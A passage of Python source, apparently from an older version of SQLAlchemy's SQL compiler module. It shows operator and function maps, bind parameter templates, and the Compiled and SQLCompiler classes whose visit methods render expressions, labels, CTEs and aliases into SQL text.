'old', 'on', 'only', 'or', 'order', 'outer', 'overlaps',
'placing', 'primary', 'references', 'right', 'select',
'session_user', 'set', 'similar', 'some', 'symmetric', 'table',
'then', 'to', 'trailing', 'true', 'union', 'unique', 'user',
'using', 'verbose', 'when', 'where'])
LEGAL_CHARACTERS = re.compile(r'^[A-Z0-9_$]+$', re.I)
ILLEGAL_INITIAL_CHARACTERS = set([str(x) for x in range(0, 10)]).union(['$'])
BIND_PARAMS = re.compile(r'(?<![:\w\$\x5c]):([\w\$]+)(?![:\w\$])', re.UNICODE)
BIND_PARAMS_ESC = re.compile(r'\x5c(:[\w\$]+)(?![:\w\$])', re.UNICODE)
BIND_TEMPLATES = {
'pyformat': "%%(%(name)s)s",
'qmark': "?",
'format': "%%s",
'numeric': ":[_POSITION]",
'named': ":%(name)s"
}
REQUIRED = util.symbol('REQUIRED', """
Placeholder for the value within a :class:`.BindParameter`
which is required to be present when the statement is passed
to :meth:`.Connection.execute`.
This symbol is typically used when a :func:`.expression.insert`
or :func:`.expression.update` statement is compiled without parameter
values present.
""")
OPERATORS = {
# binary
operators.and_: ' AND ',
operators.or_: ' OR ',
operators.add: ' + ',
operators.mul: ' * ',
operators.sub: ' - ',
operators.div: ' / ',
operators.mod: ' % ',
operators.truediv: ' / ',
operators.neg: '-',
operators.lt: ' < ',
operators.le: ' <= ',
operators.ne: ' != ',
operators.gt: ' > ',
operators.ge: ' >= ',
operators.eq: ' = ',
operators.concat_op: ' || ',
operators.between_op: ' BETWEEN ',
operators.match_op: ' MATCH ',
operators.in_op: ' IN ',
operators.notin_op: ' NOT IN ',
operators.comma_op: ', ',
operators.from_: ' FROM ',
operators.as_: ' AS ',
operators.is_: ' IS ',
operators.isnot: ' IS NOT ',
operators.collate: ' COLLATE ',
# unary
operators.exists: 'EXISTS ',
operators.distinct_op: 'DISTINCT ',
operators.inv: 'NOT ',
# modifiers
operators.desc_op: ' DESC',
operators.asc_op: ' ASC',
operators.nullsfirst_op: ' NULLS FIRST',
operators.nullslast_op: ' NULLS LAST',
}
FUNCTIONS = {
functions.coalesce: 'coalesce%(expr)s',
functions.current_date: 'CURRENT_DATE',
functions.current_time: 'CURRENT_TIME',
functions.current_timestamp: 'CURRENT_TIMESTAMP',
functions.current_user: 'CURRENT_USER',
functions.localtime: 'LOCALTIME',
functions.localtimestamp: 'LOCALTIMESTAMP',
functions.random: 'random%(expr)s',
functions.sysdate: 'sysdate',
functions.session_user: 'SESSION_USER',
functions.user: 'USER'
}
EXTRACT_MAP = {
'month': 'month',
'day': 'day',
'year': 'year',
'second': 'second',
'hour': 'hour',
'doy': 'doy',
'minute': 'minute',
'quarter': 'quarter',
'dow': 'dow',
'week': 'week',
'epoch': 'epoch',
'milliseconds': 'milliseconds',
'microseconds': 'microseconds',
'timezone_hour': 'timezone_hour',
'timezone_minute': 'timezone_minute'
}
COMPOUND_KEYWORDS = {
selectable.CompoundSelect.UNION: 'UNION',
selectable.CompoundSelect.UNION_ALL: 'UNION ALL',
selectable.CompoundSelect.EXCEPT: 'EXCEPT',
selectable.CompoundSelect.EXCEPT_ALL: 'EXCEPT ALL',
selectable.CompoundSelect.INTERSECT: 'INTERSECT',
selectable.CompoundSelect.INTERSECT_ALL: 'INTERSECT ALL'
}
class Compiled(object):
"""Represent a compiled SQL or DDL expression.
The ``__str__`` method of the ``Compiled`` object should produce
the actual text of the statement. ``Compiled`` objects are
specific to their underlying database dialect, and also may
or may not be specific to the columns referenced within a
particular set of bind parameters. In no case should the
``Compiled`` object be dependent on the actual values of those
bind parameters, even though it may reference those values as
defaults.
"""
def __init__(self, dialect, statement, bind=None,
compile_kwargs=util.immutabledict()):
"""Construct a new ``Compiled`` object.
:param dialect: ``Dialect`` to compile against.
:param statement: ``ClauseElement`` to be compiled.
:param bind: Optional Engine or Connection to compile this
statement against.
:param compile_kwargs: additional kwargs that will be
passed to the initial call to :meth:`.Compiled.process`.
.. versionadded:: 0.8
"""
self.dialect = dialect
self.bind = bind
if statement is not None:
self.statement = statement
self.can_execute = statement.supports_execution
self.string = self.process(self.statement, **compile_kwargs)
@util.deprecated("0.7", ":class:`.Compiled` objects now compile "
"within the constructor.")
def compile(self):
"""Produce the internal string representation of this element.
"""
pass
def _execute_on_connection(self, connection, multiparams, params):
return connection._execute_compiled(self, multiparams, params)
@property
def sql_compiler(self):
"""Return a Compiled that is capable of processing SQL expressions.
If this compiler is one, it would likely just return 'self'.
"""
raise NotImplementedError()
def process(self, obj, **kwargs):
return obj._compiler_dispatch(self, **kwargs)
def __str__(self):
"""Return the string text of the generated SQL or DDL."""
return self.string or ''
def construct_params(self, params=None):
"""Return the bind params for this compiled object.
:param params: a dict of string/object pairs whose values will
override bind values compiled in to the
statement.
"""
raise NotImplementedError()
@property
def params(self):
"""Return the bind params for this compiled object."""
return self.construct_params()
def execute(self, *multiparams, **params):
"""Execute this compiled object."""
e = self.bind
if e is None:
raise exc.UnboundExecutionError(
"This Compiled object is not bound to any Engine "
"or Connection.")
return e._execute_compiled(self, multiparams, params)
def scalar(self, *multiparams, **params):
"""Execute this compiled object and return the result's
scalar value."""
return self.execute(*multiparams, **params).scalar()
class TypeCompiler(object):
"""Produces DDL specification for TypeEngine objects."""
def __init__(self, dialect):
self.dialect = dialect
def process(self, type_):
return type_._compiler_dispatch(self)
class _CompileLabel(visitors.Visitable):
"""lightweight label object which acts as an expression.Label."""
__visit_name__ = 'label'
__slots__ = 'element', 'name'
def __init__(self, col, name, alt_names=()):
self.element = col
self.name = name
self._alt_names = (col,) + alt_names
@property
def proxy_set(self):
return self.element.proxy_set
@property
def type(self):
return self.element.type
class SQLCompiler(Compiled):
"""Default implementation of Compiled.
Compiles ClauseElements into SQL strings. Uses a similar visit
paradigm as visitors.ClauseVisitor but implements its own traversal.
"""
extract_map = EXTRACT_MAP
compound_keywords = COMPOUND_KEYWORDS
isdelete = isinsert = isupdate = False
"""class-level defaults which can be set at the instance
level to define if this Compiled instance represents
INSERT/UPDATE/DELETE
"""
returning = None
"""holds the "returning" collection of columns if
the statement is CRUD and defines returning columns
either implicitly or explicitly
"""
returning_precedes_values = False
"""set to True classwide to generate RETURNING
clauses before the VALUES or WHERE clause (i.e. MSSQL)
"""
render_table_with_column_in_update_from = False
"""set to True classwide to indicate the SET clause
in a multi-table UPDATE statement should qualify
columns with the table name (i.e. MySQL only)
"""
ansi_bind_rules = False
"""SQL 92 doesn't allow bind parameters to be used
in the columns clause of a SELECT, nor does it allow
ambiguous expressions like "? = ?". A compiler
subclass can set this flag to False if the target
driver/DB enforces this
"""
def __init__(self, dialect, statement, column_keys=None,
inline=False, **kwargs):
"""Construct a new ``DefaultCompiler`` object.
dialect
Dialect to be used
statement
ClauseElement to be compiled
column_keys
a list of column names to be compiled into an INSERT or UPDATE
statement.
"""
self.column_keys = column_keys
# compile INSERT/UPDATE defaults/sequences inlined (no pre-
# execute)
self.inline = inline or getattr(statement, 'inline', False)
# a dictionary of bind parameter keys to BindParameter
# instances.
self.binds = {}
# a dictionary of BindParameter instances to "compiled" names
# that are actually present in the generated SQL
self.bind_names = util.column_dict()
# stack which keeps track of nested SELECT statements
self.stack = []
# relates label names in the final SQL to a tuple of local
# column/label name, ColumnElement object (if any) and
# TypeEngine. ResultProxy uses this for type processing and
# column targeting
self.result_map = {}
# true if the paramstyle is positional
self.positional = dialect.positional
if self.positional:
self.positiontup = []
self.bindtemplate = BIND_TEMPLATES[dialect.paramstyle]
self.ctes = None
# an IdentifierPreparer that formats the quoting of identifiers
self.preparer = dialect.identifier_preparer
self.label_length = dialect.label_length \
or dialect.max_identifier_length
# a map which tracks "anonymous" identifiers that are created on
# the fly here
self.anon_map = util.PopulateDict(self._process_anon)
# a map which tracks "truncated" names based on
# dialect.label_length or dialect.max_identifier_length
self.truncated_names = {}
Compiled.__init__(self, dialect, statement, **kwargs)
if self.positional and dialect.paramstyle == 'numeric':
self._apply_numbered_params()
@util.memoized_instancemethod
def _init_cte_state(self):
"""Initialize collections related to CTEs only if
a CTE is located, to save on the overhead of
these collections otherwise.
"""
# collect CTEs to tack on top of a SELECT
self.ctes = util.OrderedDict()
self.ctes_by_name = {}
self.ctes_recursive = False
if self.positional:
self.cte_positional = []
def _apply_numbered_params(self):
poscount = itertools.count(1)
self.string = re.sub(
r'\[_POSITION\]',
lambda m: str(util.next(poscount)),
self.string)
@util.memoized_property
def _bind_processors(self):
return dict(
(key, value) for key, value in
((self.bind_names[bindparam],
bindparam.type._cached_bind_processor(self.dialect))
for bindparam in self.bind_names)
if value is not None
)
def is_subquery(self):
return len(self.stack) > 1
@property
def sql_compiler(self):
return self
def construct_params(self, params=None, _group_number=None, _check=True):
"""return a dictionary of bind parameter keys and values"""
if params:
pd = {}
for bindparam, name in self.bind_names.items():
if bindparam.key in params:
pd[name] = params[bindparam.key]
elif name in params:
pd[name] = params[name]
elif _check and bindparam.required:
if _group_number:
raise exc.InvalidRequestError(
"A value is required for bind parameter %r, "
"in parameter group %d" %
(bindparam.key, _group_number))
else:
raise exc.InvalidRequestError(
"A value is required for bind parameter %r"
% bindparam.key)
else:
pd[name] = bindparam.effective_value
return pd
else:
pd = {}
for bindparam in self.bind_names:
if _check and bindparam.required:
if _group_number:
raise exc.InvalidRequestError(
"A value is required for bind parameter %r, "
"in parameter group %d" %
(bindparam.key, _group_number))
else:
raise exc.InvalidRequestError(
"A value is required for bind parameter %r"
% bindparam.key)
pd[self.bind_names[bindparam]] = bindparam.effective_value
return pd
@property
def params(self):
"""Return the bind param dictionary embedded into this
compiled object, for those values that are present."""
return self.construct_params(_check=False)
def default_from(self):
"""Called when a SELECT statement has no froms, and no FROM clause is
to be appended.
Gives Oracle a chance to tack on a ``FROM DUAL`` to the string output.
"""
return ""
def visit_grouping(self, grouping, asfrom=False, **kwargs):
return "(" + grouping.element._compiler_dispatch(self, **kwargs) + ")"
def visit_label(self, label,
add_to_result_map=None,
within_label_clause=False,
within_columns_clause=False,
render_label_as_label=None,
**kw):
# only render labels within the columns clause
# or ORDER BY clause of a select. dialect-specific compilers
# can modify this behavior.
render_label_with_as = within_columns_clause and not within_label_clause
render_label_only = render_label_as_label is label
if render_label_only or render_label_with_as:
if isinstance(label.name, elements._truncated_label):
labelname = self._truncated_identifier("colident", label.name)
else:
labelname = label.name
if render_label_with_as:
if add_to_result_map is not None:
add_to_result_map(
labelname,
label.name,
(label, labelname, ) + label._alt_names,
label.type
)
return label.element._compiler_dispatch(self,
within_columns_clause=True,
within_label_clause=True,
**kw) + \
OPERATORS[operators.as_] + \
self.preparer.format_label(label, labelname)
elif render_label_only:
return labelname
else:
return label.element._compiler_dispatch(self,
within_columns_clause=False,
**kw)
def visit_column(self, column, add_to_result_map=None,
include_table=True, **kwargs):
name = orig_name = column.name
if name is None:
raise exc.CompileError("Cannot compile Column object until "
"its 'name' is assigned.")
is_literal = column.is_literal
if not is_literal and isinstance(name, elements._truncated_label):
name = self._truncated_identifier("colident", name)
if add_to_result_map is not None:
add_to_result_map(
name,
orig_name,
(column, name, column.key),
column.type
)
if is_literal:
name = self.escape_literal_column(name)
else:
name = self.preparer.quote(name)
table = column.table
if table is None or not include_table or not table.named_with_column:
return name
else:
if table.schema:
schema_prefix = self.preparer.quote_schema(table.schema) + '.'
else:
schema_prefix = ''
tablename = table.name
if isinstance(tablename, elements._truncated_label):
tablename = self._truncated_identifier("alias", tablename)
return schema_prefix + \
self.preparer.quote(tablename) + \
"." + name
def escape_literal_column(self, text):
"""provide escaping for the literal_column() construct."""
# TODO: some dialects might need different behavior here
return text.replace('%', '%%')
def visit_fromclause(self, fromclause, **kwargs):
return fromclause.name
def visit_index(self, index, **kwargs):
return index.name
def visit_typeclause(self, typeclause, **kwargs):
return self.dialect.type_compiler.process(typeclause.type)
def post_process_text(self, text):
return text
def visit_textclause(self, textclause, **kw):
def do_bindparam(m):
name = m.group(1)
if name in textclause._bindparams:
return self.process(textclause._bindparams[name], **kw)
else:
return self.bindparam_string(name, **kw)
# un-escape any \:params
return BIND_PARAMS_ESC.sub(lambda m: m.group(1),
BIND_PARAMS.sub(do_bindparam,
self.post_process_text(textclause.text))
)
def visit_text_as_from(self, taf, iswrapper=False,
compound_index=0, force_result_map=False,
asfrom=False,
parens=True, **kw):
toplevel = not self.stack
entry = self._default_stack_entry if toplevel else self.stack[-1]
populate_result_map = force_result_map or (
compound_index == 0 and (
toplevel or \
entry['iswrapper']
)
)
if populate_result_map:
for c in taf.column_args:
self.process(c, within_columns_clause=True,
add_to_result_map=self._add_to_result_map)
text = self.process(taf.element, **kw)
if asfrom and parens:
text = "(%s)" % text
return text
def visit_null(self, expr, **kw):
return 'NULL'
def visit_true(self, expr, **kw):
if self.dialect.supports_native_boolean:
return 'true'
else:
return "1"
def visit_false(self, expr, **kw):
if self.dialect.supports_native_boolean:
return 'false'
else:
return "0"
def visit_clauselist(self, clauselist, order_by_select=None, **kw):
if order_by_select is not None:
return self._order_by_clauselist(
clauselist, order_by_select, **kw)
sep = clauselist.operator
if sep is None:
sep = " "
else:
sep = OPERATORS[clauselist.operator]
return sep.join(
s for s in
(
c._compiler_dispatch(self, **kw)
for c in clauselist.clauses)
if s)
def _order_by_clauselist(self, clauselist, order_by_select, **kw):
# look through raw columns collection for labels.
# note that its OK we aren't expanding tables and other selectables
# here; we can only add a label in the ORDER BY for an individual
# label expression in the columns clause.
raw_col = set(l._order_by_label_element.name
for l in order_by_select._raw_columns
if l._order_by_label_element is not None)
return ", ".join(
s for s in
(
c._compiler_dispatch(self,
render_label_as_label=
c._order_by_label_element if
c._order_by_label_element is not None and
c._order_by_label_element.name in raw_col
else None,
**kw)
for c in clauselist.clauses)
if s)
def visit_case(self, clause, **kwargs):
x = "CASE "
if clause.value is not None:
x += clause.value._compiler_dispatch(self, **kwargs) + " "
for cond, result in clause.whens:
x += "WHEN " + cond._compiler_dispatch(
self, **kwargs
) + " THEN " + result._compiler_dispatch(
self, **kwargs) + " "
if clause.else_ is not None:
x += "ELSE " + clause.else_._compiler_dispatch(
self, **kwargs
) + " "
x += "END"
return x
def visit_cast(self, cast, **kwargs):
return "CAST(%s AS %s)" % \
(cast.clause._compiler_dispatch(self, **kwargs),
cast.typeclause._compiler_dispatch(self, **kwargs))
def visit_over(self, over, **kwargs):
return "%s OVER (%s)" % (
over.func._compiler_dispatch(self, **kwargs),
' '.join(
'%s BY %s' % (word, clause._compiler_dispatch(self, **kwargs))
for word, clause in (
('PARTITION', over.partition_by),
('ORDER', over.order_by)
)
if clause is not None and len(clause)
)
)
def visit_extract(self, extract, **kwargs):
field = self.extract_map.get(extract.field, extract.field)
return "EXTRACT(%s FROM %s)" % (field,
extract.expr._compiler_dispatch(self, **kwargs))
def visit_function(self, func, add_to_result_map=None, **kwargs):
if add_to_result_map is not None:
add_to_result_map(
func.name, func.name, (), func.type
)
disp = getattr(self, "visit_%s_func" % func.name.lower(), None)
if disp:
return disp(func, **kwargs)
else:
name = FUNCTIONS.get(func.__class__, func.name + "%(expr)s")
return ".".join(list(func.packagenames) + [name]) % \
{'expr': self.function_argspec(func, **kwargs)}
def visit_next_value_func(self, next_value, **kw):
return self.visit_sequence(next_value.sequence)
def visit_sequence(self, sequence):
raise NotImplementedError(
"Dialect '%s' does not support sequence increments." %
self.dialect.name
)
def function_argspec(self, func, **kwargs):
return func.clause_expr._compiler_dispatch(self, **kwargs)
def visit_compound_select(self, cs, asfrom=False,
parens=True, compound_index=0, **kwargs):
toplevel = not self.stack
entry = self._default_stack_entry if toplevel else self.stack[-1]
self.stack.append(
{
'correlate_froms': entry['correlate_froms'],
'iswrapper': toplevel,
'asfrom_froms': entry['asfrom_froms']
})
keyword = self.compound_keywords.get(cs.keyword)
text = (" " + keyword + " ").join(
(c._compiler_dispatch(self,
asfrom=asfrom, parens=False,
compound_index=i, **kwargs)
for i, c in enumerate(cs.selects))
)
group_by = cs._group_by_clause._compiler_dispatch(
self, asfrom=asfrom, **kwargs)
if group_by:
text += " GROUP BY " + group_by
text += self.order_by_clause(cs, **kwargs)
text += (cs._limit is not None or cs._offset is not None) and \
self.limit_clause(cs) or ""
if self.ctes and \
compound_index == 0 and toplevel:
text = self._render_cte_clause() + text
self.stack.pop(-1)
if asfrom and parens:
return "(" + text + ")"
else:
return text
def visit_unary(self, unary, **kw):
if unary.operator:
if unary.modifier:
raise exc.CompileError(
"Unary expression does not support operator "
"and modifier simultaneously")
disp = getattr(self, "visit_%s_unary_operator" %
unary.operator.__name__, None)
if disp:
return disp(unary, unary.operator, **kw)
else:
return self._generate_generic_unary_operator(unary,
OPERATORS[unary.operator], **kw)
elif unary.modifier:
disp = getattr(self, "visit_%s_unary_modifier" %
unary.modifier.__name__, None)
if disp:
return disp(unary, unary.modifier, **kw)
else:
return self._generate_generic_unary_modifier(unary,
OPERATORS[unary.modifier], **kw)
else:
raise exc.CompileError(
"Unary expression has no operator or modifier")
def visit_istrue_unary_operator(self, element, operator, **kw):
if self.dialect.supports_native_boolean:
return self.process(element.element, **kw)
else:
return "%s = 1" % self.process(element.element, **kw)
def visit_isfalse_unary_operator(self, element, operator, **kw):
if self.dialect.supports_native_boolean:
return "NOT %s" % self.process(element.element, **kw)
else:
return "%s = 0" % self.process(element.element, **kw)
def visit_binary(self, binary, **kw):
# don't allow "? = ?" to render
if self.ansi_bind_rules and \
isinstance(binary.left, elements.BindParameter) and \
isinstance(binary.right, elements.BindParameter):
kw['literal_binds'] = True
operator = binary.operator
disp = getattr(self, "visit_%s_binary" % operator.__name__, None)
if disp:
return disp(binary, operator, **kw)
else:
try:
opstring = OPERATORS[operator]
except KeyError:
raise exc.UnsupportedCompilationError(self, operator)
else:
return self._generate_generic_binary(binary, opstring, **kw)
def visit_custom_op_binary(self, element, operator, **kw):
return self._generate_generic_binary(element,
" " + operator.opstring + " ", **kw)
def visit_custom_op_unary_operator(self, element, operator, **kw):
return self._generate_generic_unary_operator(element,
operator.opstring + " ", **kw)
def visit_custom_op_unary_modifier(self, element, operator, **kw):
return self._generate_generic_unary_modifier(element,
" " + operator.opstring, **kw)
def _generate_generic_binary(self, binary, opstring, **kw):
return binary.left._compiler_dispatch(self, **kw) + \
opstring + \
binary.right._compiler_dispatch(self, **kw)
def _generate_generic_unary_operator(self, unary, opstring, **kw):
return opstring + unary.element._compiler_dispatch(self, **kw)
def _generate_generic_unary_modifier(self, unary, opstring, **kw):
return unary.element._compiler_dispatch(self, **kw) + opstring
@util.memoized_property
def _like_percent_literal(self):
return elements.literal_column("'%'", type_=sqltypes.STRINGTYPE)
def visit_contains_op_binary(self, binary, operator, **kw):
binary = binary._clone()
percent = self._like_percent_literal
binary.right = percent.__add__(binary.right).__add__(percent)
return self.visit_like_op_binary(binary, operator, **kw)
def visit_notcontains_op_binary(self, binary, operator, **kw):
binary = binary._clone()
percent = self._like_percent_literal
binary.right = percent.__add__(binary.right).__add__(percent)
return self.visit_notlike_op_binary(binary, operator, **kw)
def visit_startswith_op_binary(self, binary, operator, **kw):
binary = binary._clone()
percent = self._like_percent_literal
binary.right = percent.__radd__(
binary.right
)
return self.visit_like_op_binary(binary, operator, **kw)
def visit_notstartswith_op_binary(self, binary, operator, **kw):
binary = binary._clone()
percent = self._like_percent_literal
binary.right = percent.__radd__(
binary.right
)
return self.visit_notlike_op_binary(binary, operator, **kw)
def visit_endswith_op_binary(self, binary, operator, **kw):
binary = binary._clone()
percent = self._like_percent_literal
binary.right = percent.__add__(binary.right)
return self.visit_like_op_binary(binary, operator, **kw)
def visit_notendswith_op_binary(self, binary, operator, **kw):
binary = binary._clone()
percent = self._like_percent_literal
binary.right = percent.__add__(binary.right)
return self.visit_notlike_op_binary(binary, operator, **kw)
def visit_like_op_binary(self, binary, operator, **kw):
escape = binary.modifiers.get("escape", None)
# TODO: use ternary here, not "and"/ "or"
return '%s LIKE %s' % (
binary.left._compiler_dispatch(self, **kw),
binary.right._compiler_dispatch(self, **kw)) \
+ (
' ESCAPE ' +
self.render_literal_value(escape, sqltypes.STRINGTYPE)
if escape else ''
)
def visit_notlike_op_binary(self, binary, operator, **kw):
escape = binary.modifiers.get("escape", None)
return '%s NOT LIKE %s' % (
binary.left._compiler_dispatch(self, **kw),
binary.right._compiler_dispatch(self, **kw)) \
+ (
' ESCAPE ' +
self.render_literal_value(escape, sqltypes.STRINGTYPE)
if escape else ''
)
def visit_ilike_op_binary(self, binary, operator, **kw):
escape = binary.modifiers.get("escape", None)
return 'lower(%s) LIKE lower(%s)' % (
binary.left._compiler_dispatch(self, **kw),
binary.right._compiler_dispatch(self, **kw)) \
+ (
' ESCAPE ' +
self.render_literal_value(escape, sqltypes.STRINGTYPE)
if escape else ''
)
def visit_notilike_op_binary(self, binary, operator, **kw):
escape = binary.modifiers.get("escape", None)
return 'lower(%s) NOT LIKE lower(%s)' % (
binary.left._compiler_dispatch(self, **kw),
binary.right._compiler_dispatch(self, **kw)) \
+ (
' ESCAPE ' +
self.render_literal_value(escape, sqltypes.STRINGTYPE)
if escape else ''
)
def visit_bindparam(self, bindparam, within_columns_clause=False,
literal_binds=False,
skip_bind_expression=False,
**kwargs):
if not skip_bind_expression and bindparam.type._has_bind_expression:
bind_expression = bindparam.type.bind_expression(bindparam)
return self.process(bind_expression,
skip_bind_expression=True)
if literal_binds or \
(within_columns_clause and \
self.ansi_bind_rules):
if bindparam.value is None and bindparam.callable is None:
raise exc.CompileError("Bind parameter '%s' without a "
"renderable value not allowed here."
% bindparam.key)
return self.render_literal_bindparam(bindparam,
within_columns_clause=True, **kwargs)
name = self._truncate_bindparam(bindparam)
if name in self.binds:
existing = self.binds[name]
if existing is not bindparam:
if (existing.unique or bindparam.unique) and \
not existing.proxy_set.intersection(
bindparam.proxy_set):
raise exc.CompileError(
"Bind parameter '%s' conflicts with "
"unique bind parameter of the same name" %
bindparam.key
)
elif existing._is_crud or bindparam._is_crud:
raise exc.CompileError(
"bindparam() name '%s' is reserved "
"for automatic usage in the VALUES or SET "
"clause of this "
"insert/update statement. Please use a "
"name other than column name when using bindparam() "
"with insert() or update() (for example, 'b_%s')."
% (bindparam.key, bindparam.key)
)
self.binds[bindparam.key] = self.binds[name] = bindparam
return self.bindparam_string(name, **kwargs)
def render_literal_bindparam(self, bindparam, **kw):
value = bindparam.effective_value
return self.render_literal_value(value, bindparam.type)
def render_literal_value(self, value, type_):
"""Render the value of a bind parameter as a quoted literal.
This is used for statement sections that do not accept bind parameters
on the target driver/database.
This should be implemented by subclasses using the quoting services
of the DBAPI.
"""
processor = type_._cached_literal_processor(self.dialect)
if processor:
return processor(value)
else:
raise NotImplementedError(
"Don't know how to literal-quote value %r" % value)
def _truncate_bindparam(self, bindparam):
if bindparam in self.bind_names:
return self.bind_names[bindparam]
bind_name = bindparam.key
if isinstance(bind_name, elements._truncated_label):
bind_name = self._truncated_identifier("bindparam", bind_name)
# add to bind_names for translation
self.bind_names[bindparam] = bind_name
return bind_name
def _truncated_identifier(self, ident_class, name):
if (ident_class, name) in self.truncated_names:
return self.truncated_names[(ident_class, name)]
anonname = name.apply_map(self.anon_map)
if len(anonname) > self.label_length:
counter = self.truncated_names.get(ident_class, 1)
truncname = anonname[0:max(self.label_length - 6, 0)] + \
"_" + hex(counter)[2:]
self.truncated_names[ident_class] = counter + 1
else:
truncname = anonname
self.truncated_names[(ident_class, name)] = truncname
return truncname
def _anonymize(self, name):
return name % self.anon_map
def _process_anon(self, key):
(ident, derived) = key.split(' ', 1)
anonymous_counter = self.anon_map.get(derived, 1)
self.anon_map[derived] = anonymous_counter + 1
return derived + "_" + str(anonymous_counter)
def bindparam_string(self, name, positional_names=None, **kw):
if self.positional:
if positional_names is not None:
positional_names.append(name)
else:
self.positiontup.append(name)
return self.bindtemplate % {'name': name}
def visit_cte(self, cte, asfrom=False, ashint=False,
fromhints=None,
**kwargs):
self._init_cte_state()
if self.positional:
kwargs['positional_names'] = self.cte_positional
if isinstance(cte.name, elements._truncated_label):
cte_name = self._truncated_identifier("alias", cte.name)
else:
cte_name = cte.name
if cte_name in self.ctes_by_name:
existing_cte = self.ctes_by_name[cte_name]
# we've generated a same-named CTE that we are enclosed in,
# or this is the same CTE. just return the name.
if cte in existing_cte._restates or cte is existing_cte:
return self.preparer.format_alias(cte, cte_name)
elif existing_cte in cte._restates:
# we've generated a same-named CTE that is
# enclosed in us - we take precedence, so
# discard the text for the "inner".
del self.ctes[existing_cte]
else:
raise exc.CompileError(
"Multiple, unrelated CTEs found with "
"the same name: %r" %
cte_name)
self.ctes_by_name[cte_name] = cte
if cte._cte_alias is not None:
orig_cte = cte._cte_alias
if orig_cte not in self.ctes:
self.visit_cte(orig_cte)
cte_alias_name = cte._cte_alias.name
if isinstance(cte_alias_name, elements._truncated_label):
cte_alias_name = self._truncated_identifier("alias", cte_alias_name)
else:
orig_cte = cte
cte_alias_name = None
if not cte_alias_name and cte not in self.ctes:
if cte.recursive:
self.ctes_recursive = True
text = self.preparer.format_alias(cte, cte_name)
if cte.recursive:
if isinstance(cte.original, selectable.Select):
col_source = cte.original
elif isinstance(cte.original, selectable.CompoundSelect):
col_source = cte.original.selects[0]
else:
assert False
recur_cols = [c for c in
util.unique_list(col_source.inner_columns)
if c is not None]
text += "(%s)" % (", ".join(
self.preparer.format_column(ident)
for ident in recur_cols))
text += " AS \n" + \
cte.original._compiler_dispatch(
self, asfrom=True, **kwargs
)
self.ctes[cte] = text
if asfrom:
if cte_alias_name:
text = self.preparer.format_alias(cte, cte_alias_name)
text += " AS " + cte_name
else:
return self.preparer.format_alias(cte, cte_name)
return text
def visit_alias(self, alias, asfrom=False, ashint=False,
iscrud=False,
fromhints=None, **kwargs):
if asfrom or ashint:
if isinstance(alias.name, elements._truncated_label):
alias_name = self._truncated_identifier("alias", alias.name)
else:
alias_name = alias.name
if ashint:
return self.preparer.format_alias(alias, alias_name)
elif asfrom:
ret = alias.original._compiler_dispatch(self,
asfrom=True, **kwargs) + \
" AS " + \
self.preparer.format_alias(alias, alias_name)
if fromhints and alias in fromhints:
ret = self.format_from_hint_text(ret, alias,
fromhints[alias], iscrud)
return ret
else:
return alias.original._compiler_dispatch(self, **kwargs)
def _add_to_result_map(self, keyname, name, objects, type_):
if not self.dialect.case_sensitive:
keyname = keyname.lower()
if keyname in self.result_map:
# conflicting keyname, just double up the list
# of objects. this will cause an "ambiguous name"
# error if an attempt is made by the result set to
# access.
e_name, e_obj, e_type = self.result_map[keyname]
self.result_map[keyname] = e_name, e_obj + objects, e_type
else:
self.result_map[keyname] = name, objects, type_
def _label_select_column(self, select, column,
populate_result_map,
asfrom, column_clause_args,
name=None,
within_columns_clause=True):
"""produce labeled columns present in a select()."""
if column.type._has_column_expression and \
populate_result_map:
col_expr = column.type.column_expression(column)
add_to_result_map = lambda keyname, name, objects, type_: \
self._add_to_result_map(
keyname, name,
objects + (column,), type_)
else:
col_expr = column
if populate_result_map:
add_to_result_map = self._add_to_result_map
else:
add_to_result_map = None
if not within_columns_clause:
result_expr = col_expr
elif isinstance(column, elements.Label):
if col_expr is not column:
result_expr = _CompileLabel(
col_expr,
column.name,
alt_names=(column.element,)
)
else:
result_expr = col_expr
elif select is not None and name:
result_expr = _CompileLabel(
col_expr,
name,
alt_names=(column._key_label,)
)
elif \
asfrom and \
isinstance(column, elements.ColumnClause) and \
not column.is_literal and \
column.table is not None and \
not isinstance(column.table, selectable.Select):
result_expr = _CompileLabel(col_expr,
elements._as_truncated(column.name),
alt_names=(column.key,))
elif not isinstance(column,
(elements.UnaryExpression, elements.TextClause)) \
and (not hasattr(column, 'name') or \
isinstance(column, functions.Function)):
result_expr = _CompileLabel(col_expr, column.anon_label)
elif col_expr is not column:
# TODO: are we sure "column" has a .name and .key here ?
# assert isinstance(column, elements.ColumnClause)
result_expr = _CompileLabel(col_expr,
elements._as_truncated(column.name),
alt_names=(column.key,))
else:
result_expr = col_expr
column_clause_args.update(
within_columns_clause=within_columns_clause,
add_to_result_map=add_to_result_map
)
return result_expr._compiler_dispatch(
self,
**column_clause_args
)
def format_from_hint_text(self, sqltext, table, hint, iscrud):
hinttext = self.get_from_hint_text(table, hint)
if hinttext:
sqltext += " " + hinttext
return sqltext
def get_select_hint_text(self, byfroms):
return None
def get_from_hint_text(self, table, text):
return None
def get_crud_hint_text(self, table, text):
return None
def _transform_select_for_nested_joins(self, select):
"""Rewrite any "a JOIN (b JOIN c)" expression as
"a JOIN (select * from b JOIN c) AS anon", to support
databases that can't parse a parenthesized join correctly
(i.e. sqlite the main one).
"""
cloned = {}
column_translate = [{}]
def visit(element, **kw):
if element in column_translate[-1]:
return column_translate[-1][element]
elif element in cloned:
return cloned[element]
newelem = cloned[element] = element._clone()
if newelem.is_selectable and newelem._is_join and \
isinstance(newelem.right, selectable.FromGrouping):
newelem._reset_exported()
newelem.left = visit(newelem.left, **kw)
right = visit(newelem.right, **kw)
selectable_ = selectable.Select(
[right.element],
use_labels=True).alias()
for c in selectable_.c:
c._key_label = c.key
c._label = c.name
translate_dict = dict(
zip(newelem.right.element.c, selectable_.c)
)
# translating from both the old and the new
# because different select() structures will lead us
# to traverse differently
translate_dict[right.element.left] = selectable_
translate_dict[right.element.right] = selectable_
translate_dict[newelem.right.element.left] = selectable_
translate_dict[newelem.right.element.right] = selectable_
# propagate translations that we've gained
# from nested visit(newelem.right) outwards
# to the enclosing select here. this happens
# only when we have more than one level of right
# join nesting, i.e. "a JOIN (b JOIN (c JOIN d))"
for k, v in list(column_translate[-1].items()):
if v in translate_dict:
# remarkably, no current ORM tests (May 2013)
# hit this condition, only test_join_rewriting
# does.
column_translate[-1][k] = translate_dict[v]
column_translate[-1].update(translate_dict)
newelem.right = selectable_
newelem.onclause = visit(newelem.onclause, **kw)
elif newelem.is_selectable and newelem._is_from_container:
